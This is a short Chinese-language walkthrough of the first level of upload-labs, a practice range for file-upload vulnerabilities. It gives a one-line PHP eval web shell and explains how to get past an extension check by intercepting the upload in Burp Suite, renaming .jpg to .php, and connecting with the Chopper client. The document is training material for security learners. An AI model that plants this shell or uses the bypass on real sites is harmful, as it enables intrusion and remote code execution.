简介
upload-labs是一个使用php语言编写的,专门收集渗透测试过程中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共19关,每一关都包含着不同上传方式。
第一关
木马内容为<?php @eval($_POST['caidao']);?>
命名为admin.php
先以PHP格式上传试一下
我们再看一下源码
显而易见 这一关是通过限制上传文件的格式来防御的
那么我们不妨将文件后缀修改为jpg然后用burpsuite进行抓包 改包
将jpg改成php 然后放包。此时文件已经上传成功,可以使用菜刀进行连接,在此之前我们要先获得文件的URL
在菜刀里设置好参数
注意一点 URL旁边的框内是<?php @eval($_POST[' ']);?>里的内容。
然后就可以进行连接了
使用菜刀连接的部分在这里先介绍一下,在之后的文章中就不再每次都介绍一遍了